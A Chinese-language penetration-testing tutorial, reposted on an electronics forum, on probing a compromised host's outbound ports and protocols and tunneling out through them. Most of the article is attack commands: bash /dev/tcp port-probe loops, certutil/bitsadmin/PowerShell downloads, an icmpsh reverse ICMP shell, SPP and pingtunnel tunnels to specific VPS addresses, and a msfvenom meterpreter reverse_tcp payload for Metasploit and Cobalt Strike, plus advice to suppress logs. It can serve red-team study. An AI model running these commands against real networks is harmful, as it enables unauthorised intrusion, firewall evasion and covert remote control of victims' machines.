0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫(xiě)文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

出網(wǎng)探測(cè)是什么

jf_vLt34KHi ? 來(lái)源:Tide安全團(tuán)隊(duì) ? 作者: komorebi ? 2022-10-20 14:26 ? 次閱讀

出網(wǎng)探測(cè)

出網(wǎng)探測(cè)就是要探測(cè)出網(wǎng)協(xié)議,出站ip和出站端口。查看是否禁止了出站ip或者禁止了出站端口或者禁止了出站協(xié)議。

目標(biāo)禁止出站ip

如果目標(biāo)主機(jī)設(shè)置了嚴(yán)格的策略,防火墻只允許目標(biāo)內(nèi)網(wǎng)機(jī)器主動(dòng)連接公網(wǎng)指定的ip。這樣的話,沒(méi)法反彈shell。(因?yàn)榘酌麊蝘p沒(méi)有辦法拿到權(quán)限)。

禁止出站端口

Linux系統(tǒng)使用Linux系統(tǒng)自帶命令探測(cè)出網(wǎng)端口。( 探測(cè)目標(biāo)機(jī)器可以訪問(wèn)baidu.com對(duì)應(yīng)ip的端口)

foriin{440..449};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i***********************open************************"||echo"$iclosed";done
8e2b74f4-4f8f-11ed-a3b6-dac502259ad0.png

webshell不好回顯結(jié)果,將結(jié)果寫(xiě)入文件中

foriin{440..449};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done>>result.txt
8e4e41b4-4f8f-11ed-a3b6-dac502259ad0.png

探測(cè)常見(jiàn)端口

foriin{21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done
foriin{21,22,23,25,53,80,88,110,137,138,139,123,143,389,443,445,161,1521,3306,3389,6379,7001,7002,8000,8001,8080,8090,9000,9090,11211};dotimeout0.5bash-c"echo>/dev/tcp/baidu.com/$i"&&echo"$i************************open************************"||echo"$iclosed";done>>result.txt

攻擊端的端口請(qǐng)求記錄

從目標(biāo)發(fā)起的端口訪問(wèn)請(qǐng)求,攻擊端必須得配合記錄,否則即便找到有效的出站端口,我們也無(wú)法獲悉。思路一,單個(gè)逐次監(jiān)聽(tīng)端口。對(duì)于少量端口的探測(cè),攻擊端很容易記錄。比如,要驗(yàn)證 windows 目標(biāo)的 8088 端口是否為出站端口,先在攻擊端用 nc -n -v -lp 8088 監(jiān)聽(tīng) 8088,指定 -v 選項(xiàng)觀察實(shí)時(shí)訪問(wèn)記錄,再在目標(biāo)上用 telnet 192.168.56.8 8088 連接攻擊端的 8088 端口,最后在攻擊端查看端口訪問(wèn)記錄,若有則該端口是有效出站端口,若無(wú)則重復(fù)以上步驟繼續(xù)驗(yàn)證其他端口。

二,批量捆綁監(jiān)聽(tīng)端口。試想一下,如果能夠把攻擊端的多個(gè)端口流量轉(zhuǎn)發(fā)至單個(gè)匯聚端口,就只需監(jiān)聽(tīng)單個(gè)匯聚端口,目標(biāo)上發(fā)起多個(gè)端口探測(cè),只要在攻擊端轉(zhuǎn)發(fā)的多個(gè)端口的范圍內(nèi),那么,一旦找到有效出站端口,攻擊端的匯聚端口一定有訪問(wèn)記錄。說(shuō)到端口轉(zhuǎn)發(fā),系統(tǒng)自帶的 ssh、iptables,三方的 frp、nps,這些工具都能高效實(shí)現(xiàn),于是,我從這四個(gè)工具中找尋具備端口捆綁能力的那位 攻擊端這邊需要有?標(biāo)機(jī)訪問(wèn)的記錄,才能更好的判斷?標(biāo)機(jī)器是否訪問(wèn)了我們。只要?標(biāo)機(jī)器訪問(wèn)到 了我們VPS的任意?個(gè)端?,我們這邊都能有記錄。//將所有端?的流量都綁定到34444端?

iptables-APREROUTING-tnat-ptcp--dport1:65535-jREDIRECT--to-port34444

//查看nat表的規(guī)則

iptables-tnat-nvL

//清除nat表所有規(guī)則

iptables-tnat-F

//備份iptables規(guī)則

iptables-save>/tmp/firewall.rules

//恢復(fù)iptables規(guī)則

iptables-restore

配置防?墻規(guī)則,禁?訪問(wèn)遠(yuǎn)程機(jī)器的1-34566和34566-65535端?,也就是說(shuō)只允許訪問(wèn)34567端?然后我們這邊監(jiān)聽(tīng)34444端?,在?標(biāo)機(jī)器端?探測(cè)

8ea18c5c-4f8f-11ed-a3b6-dac502259ad0.png

禁止出站協(xié)議

對(duì)于禁止出站協(xié)議的情況,需要探測(cè)目標(biāo)機(jī)器允許哪些協(xié)議出網(wǎng)。

探測(cè)ICMP協(xié)議服務(wù)端

監(jiān)聽(tīng)I(yíng)CMP流量:

tcpdumpicmp

客戶(hù)端ping VPS地址,查看服務(wù)端能否收到請(qǐng)求VPS監(jiān)聽(tīng),然后ping我們vps查看能否收到監(jiān)聽(tīng)來(lái)判斷ICMP 協(xié)議是否出?。也可以直接ping?個(gè)地址,看是否 有ttl值。

探測(cè)DNS協(xié)議

Windows:

nslookup、ping

Linux:

nslookup、dig、ping

通過(guò)判斷能否將域名解析為ip,判斷DNS協(xié)議是否出?。也可以將域名換成dnslog的域名,再看dnslog能否收到請(qǐng)求。

探測(cè)HTTP協(xié)議

Linux:可以使用curl命令

curlhttp://192.168.10.13

Windows系統(tǒng)可以使用如下的命令

certutil-urlcache-split-fhttp://www.baidu.com
bitsadmin/transfertesthttp://192.168.10.13/1c:1
powershelliwr-Urihttp://www.baidu.com-OutFile1-UseBasicParsing

只有ICMP協(xié)議出網(wǎng)

目標(biāo)只有icmp協(xié)議能出?的話,則只有考慮使?icmp協(xié)議來(lái)搭建隧道。利?icmp協(xié)議通信的?具有很多icmpsh、reverse-icmp-shell、PingTunnel、IcmpTunnel都可以。常?的ping命令就是利?的ICMP協(xié)議。

icmpsh(2016+kali2017)

icmpsh 是一個(gè)簡(jiǎn)單的反向 ICMP shell,帶有一個(gè) win32 從站和一個(gè) C、Perl 或 Python 中的兼容主站。與其他類(lèi)似的開(kāi)源工具相比,它的主要優(yōu)勢(shì)在于它不需要管理權(quán)限即可在目標(biāo)機(jī)器上運(yùn)行。使用ICMP進(jìn)行命令控制(Icmpsh)適?場(chǎng)景:?標(biāo)機(jī)器是Windows服務(wù)器 Linux服務(wù)器執(zhí)行

#關(guān)閉icmp回復(fù),如果要開(kāi)啟icmp回復(fù),該值設(shè)置為0
sysctl-wnet.ipv4.icmp_echo_ignore_all=1
#運(yùn)?,第?個(gè)IP是VPS的eth0?卡IP(vps上ifconfig可以得到),第?個(gè)IP是?標(biāo)機(jī)器出?的公?IP
python2icmpsh_m.py192.168.10.8192.168.10.7

目標(biāo)機(jī)器的操作:

icmpsh.exe-t192.168.10.8
8eafaabc-4f8f-11ed-a3b6-dac502259ad0.png

可以看到已經(jīng)反彈出一個(gè)shell

ICMP上線CS

有如下場(chǎng)景,我們拿到了內(nèi)?的機(jī)器權(quán)限。但是機(jī)器對(duì)外均只有icmp協(xié)議出網(wǎng),我們現(xiàn)在可以利?icmp封裝tcp協(xié)議,讓其上線cs。

使用SPP

平常演練常用的一些隧道工具像frp,nps在目標(biāo)出網(wǎng)的情況下還是比較好用的。但是一旦遇到一些比較惡劣的環(huán)境,比如只有icmp可以出網(wǎng)的情況,那就需要使用其他的工具像pingtunnel,ptunnel等。SPP三個(gè)特點(diǎn):、 支持icmp、kcp、quic 支持雙向的代理 可以自由進(jìn)行內(nèi)部外協(xié)議的組合

功能:支持的協(xié)議:tcp、udp、rudp(可靠udp)、ricmp(可靠icmp)、rhttp(可靠http)、kcp、quic 支持的類(lèi)型:正向代理、反向代理、socks5正向代理、socks5反向代理 協(xié)議和類(lèi)型可以自由組合 外部代理協(xié)議和內(nèi)部轉(zhuǎn)發(fā)協(xié)議可以自由組合 支持shadowsock/s插件,spp-shadowsock/s-plugin,spp-shadowsock/s-plugin-android cs服務(wù)器端

./spp-typeserver-protoricmp-listen0.0.0.0

客戶(hù)端

spp-name"test"-typeproxy_client-server140.143.167.58-fromaddr:8082-toaddr:8081-proxyprototcp-protoricmp
8ee3edcc-4f8f-11ed-a3b6-dac502259ad0.png

pingtunnel上線MSF&CS

1、pingtunnel下載鏈接

https://github.com/esrrhs/pingtunnel/releases

注意,在客戶(hù)端中運(yùn)行一定要加noprint nolog兩個(gè)參數(shù),否則會(huì)生成大量的日志文件;ICMP為網(wǎng)絡(luò)層協(xié)議,應(yīng)用層防火墻無(wú)法識(shí)別,且請(qǐng)求包當(dāng)中的數(shù)據(jù)字段被加密 2 vps服務(wù)端開(kāi)啟

##開(kāi)啟服務(wù)器模式
./pingtunnel-typeserver

3、客戶(hù)端開(kāi)啟上傳客戶(hù)端

##客戶(hù)端本地監(jiān)聽(tīng)9999端口,將監(jiān)聽(tīng)到的連接通過(guò)icmpserver發(fā)送到Linsten_ip:7777端口
pingtunnel.exe-typeclient-l127.0.0.1:9999-sicmpserver_ip-t82.157.64.237:7778-tcp1-noprint1-nolog1

4、MSF上線

msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=127.0.0.1LPORT=9999-fexe-oAAA.exe

5、cs上線 建立監(jiān)聽(tīng)127.0.0.1:9999和192.168.3.76:7777 對(duì)127的監(jiān)聽(tīng)生成木馬AAA.exe,傳到靶機(jī)運(yùn)行

pingtunnel.exe-typeclient-l127.0.0.1:9999-s192.168.3.76-t192.168.3.76:7777-tcp1-noprint1-nolog1

審核編輯:湯梓紅

聲明:本文內(nèi)容及配圖由入駐作者撰寫(xiě)或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • Linux
    +關(guān)注

    關(guān)注

    87

    文章

    11171

    瀏覽量

    208479
  • WINDOWS
    +關(guān)注

    關(guān)注

    3

    文章

    3510

    瀏覽量

    88211
  • 端口
    +關(guān)注

    關(guān)注

    4

    文章

    935

    瀏覽量

    31948

原文標(biāo)題:隧道與端口轉(zhuǎn)發(fā)

文章出處:【微信號(hào):Tide安全團(tuán)隊(duì),微信公眾號(hào):Tide安全團(tuán)隊(duì)】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏

    評(píng)論

    相關(guān)推薦

    被動(dòng)聲探測(cè)網(wǎng)數(shù)據(jù)仿真系統(tǒng)的設(shè)計(jì)與實(shí)現(xiàn)

    被動(dòng)聲探測(cè)網(wǎng)數(shù)據(jù)仿真系統(tǒng)的設(shè)計(jì)與實(shí)現(xiàn)摘要以被動(dòng)聲探測(cè)網(wǎng)數(shù)據(jù)融合仿真測(cè)試評(píng)估系統(tǒng)的研究和開(kāi)發(fā)為背景,討論了被動(dòng)聲探測(cè)
    發(fā)表于 08-08 09:35

    電纜探測(cè)

    時(shí)會(huì)出現(xiàn)內(nèi)部斷線外部完好,沒(méi)有儀器情況下是找不到斷線位置。我們研制《電纜斷線探測(cè)器》可探測(cè)各種大小型多芯低壓電纜, 地埋電纜。檢測(cè)位置準(zhǔn)確,隔皮檢測(cè),不損壞電纜。精度10毫米。備有樣品,以供觀看。如果需要請(qǐng)聯(lián)系。地址:河南省孟
    發(fā)表于 05-06 18:32

    地下金屬探測(cè)

    本帖最后由 eehome 于 2013-1-5 09:49 編輯 大俠們,誰(shuí)有這方面的資料可以共享下,想研究一個(gè)能探測(cè)地下金屬的東西電子產(chǎn)品玩玩,我自己本身是做硬件電子開(kāi)發(fā)的,不過(guò)不涉及這塊,大俠們,有資料記得分享下萬(wàn)分感謝{:soso_e100:}
    發(fā)表于 10-24 15:20

    簡(jiǎn)易照明線路探測(cè)

    設(shè)計(jì) 并制作 具有顯示器的 簡(jiǎn)易 照明線路探測(cè)儀 ,能在厚度為 5mm 的五合板 正面探測(cè) 背面 2根照明 電纜 的位置, 電纜 的布線 如圖 1所示 。電纜一 端與 220V 交流電源插座相連
    發(fā)表于 09-04 09:34

    光子探測(cè)

    最高分辨率記錄弱信號(hào)時(shí),無(wú)噪聲檢測(cè)器便顯示其最大的優(yōu)勢(shì)。2、優(yōu)異的點(diǎn)擴(kuò)散函數(shù)采用混合像素技術(shù)和X射線直接轉(zhuǎn)換為電荷脈沖技術(shù),PILATUS探測(cè)器的像素之間沒(méi)有信號(hào)傳播。這給于單個(gè)像素形成尖銳的點(diǎn)擴(kuò)散函數(shù)
    發(fā)表于 03-03 19:12

    capture cis 網(wǎng)表沒(méi)有反應(yīng)

    昨天用capture cis 網(wǎng)表時(shí),怎么不出來(lái),總是提示下面的警告,然后就沒(méi)反應(yīng)了,檢查之后沒(méi)發(fā)現(xiàn)什么異常,最后搜素“.dsnwill be saved prior
    發(fā)表于 09-27 17:11

    電流探測(cè)

    示波器一般為輸入電壓而設(shè)計(jì),但可運(yùn)用電流探測(cè)線使示波器能測(cè)量電流.電流探測(cè)線有一對(duì)夾子,使探測(cè)線能?chē)@被測(cè)電流流過(guò)的電路。當(dāng)用電流探測(cè)線測(cè)量電流時(shí),無(wú)需有電的連接,也無(wú)需切開(kāi)電路。電流
    發(fā)表于 10-30 10:40

    超低空分布式多傳感器探測(cè)節(jié)點(diǎn)有什么優(yōu)點(diǎn)?

    由于雷達(dá)探測(cè)存在盲區(qū),低空與超低空飛行的入侵目標(biāo)給雷達(dá)防御系統(tǒng)帶來(lái)困難與威脅?;贕PS技術(shù)、多傳感器技術(shù)、網(wǎng)絡(luò)技術(shù)及單片機(jī)技術(shù)設(shè)計(jì)一種分布式多傳感器探測(cè)節(jié)點(diǎn),把遠(yuǎn)程分布的多傳感器探測(cè)
    發(fā)表于 04-14 07:50

    調(diào)試網(wǎng)絡(luò),是否可以使用以太網(wǎng)或UART在外部探測(cè)這些網(wǎng)絡(luò)?

    嗨專(zhuān)家,我想在我的設(shè)計(jì)中調(diào)試一些網(wǎng)。是否可以使用以太網(wǎng)或UART在外部探測(cè)這些網(wǎng)絡(luò)。如果可能的話,你可以提供一些教程鏈接或一些可以讓我實(shí)現(xiàn)它的文檔。您的建議和指導(dǎo)將非常有幫助。謝謝
    發(fā)表于 05-21 07:35

    被動(dòng)聲探測(cè)網(wǎng)數(shù)據(jù)仿真系統(tǒng)的設(shè)計(jì)與實(shí)現(xiàn)

    被動(dòng)聲探測(cè)網(wǎng)數(shù)據(jù)仿真系統(tǒng)的設(shè)計(jì)與實(shí)現(xiàn) 以被動(dòng)聲探測(cè)網(wǎng)數(shù)據(jù)融合仿真測(cè)試評(píng)估系統(tǒng)的研究和開(kāi)發(fā)為背景,討論了被動(dòng)聲探測(cè)
    發(fā)表于 02-23 09:45 ?7次下載

    基于方位測(cè)量的地下管線探測(cè)系統(tǒng)設(shè)計(jì)與研究

    隨著現(xiàn)代信息化技術(shù)的發(fā)展,在當(dāng)前的地下管線探測(cè)工作中,亟待應(yīng)用信息化手段設(shè)計(jì)地下管線探測(cè)系統(tǒng),實(shí)現(xiàn)對(duì)地下管線探測(cè)工作的信息化管理;對(duì)此本篇基于方位測(cè)量技術(shù),從系統(tǒng)需求分析、系統(tǒng)結(jié)構(gòu)、
    發(fā)表于 11-23 15:34 ?2次下載
    基于方位測(cè)量的地下管線<b class='flag-5'>探測(cè)</b>系統(tǒng)設(shè)計(jì)與研究

    天問(wèn)一號(hào)探測(cè)器多重

    作為本輪火星探測(cè)競(jìng)賽第二位場(chǎng)的選手,總重約5噸的“天問(wèn)一號(hào)”作為世界領(lǐng)先探測(cè)器之一
    的頭像 發(fā)表于 07-23 14:50 ?1.4w次閱讀

    各種協(xié)議判斷主機(jī)是否網(wǎng)

    允許哪些協(xié)議網(wǎng),執(zhí)行命令時(shí)可結(jié)合Wireshark工具來(lái)查看它走的什么協(xié)議。這篇文章的內(nèi)容基本摘自@Keefe 老哥博客中的 各種協(xié)議判斷目標(biāo)是否網(wǎng) 。 (1) ICMPping
    的頭像 發(fā)表于 10-16 14:19 ?3962次閱讀
    各種協(xié)議判斷主機(jī)是否<b class='flag-5'>出</b><b class='flag-5'>網(wǎng)</b>

    如何設(shè)計(jì)穩(wěn)定的以太網(wǎng)?留意這幾個(gè)設(shè)計(jì)要點(diǎn)!

    以太網(wǎng)是大部分嵌入式產(chǎn)品必備的通信接口,如何設(shè)計(jì)穩(wěn)定、可靠的以太網(wǎng)電路呢?本文綜合數(shù)名行業(yè)硬件工程師經(jīng)驗(yàn)總結(jié)以下要點(diǎn),希望能為讀者提供設(shè)計(jì)思路及解決問(wèn)題的方法。
    的頭像 發(fā)表于 04-08 15:47 ?722次閱讀
    如何設(shè)計(jì)<b class='flag-5'>出</b>穩(wěn)定的以太<b class='flag-5'>網(wǎng)</b>?留意這幾個(gè)設(shè)計(jì)要點(diǎn)!

    科學(xué)家研制一款新型柔性X射線探測(cè)

    英國(guó)科學(xué)家開(kāi)發(fā)出一種有機(jī)半導(dǎo)體材料,并利用其研制一款新型柔性X射線探測(cè)器。這種探測(cè)器不僅“身段”更柔軟,可貼合需要掃描物體的形狀,從而提高患者篩查的準(zhǔn)確性,降低腫瘤成像和放射性治療的風(fēng)險(xiǎn),而且成本
    的頭像 發(fā)表于 06-13 06:29 ?228次閱讀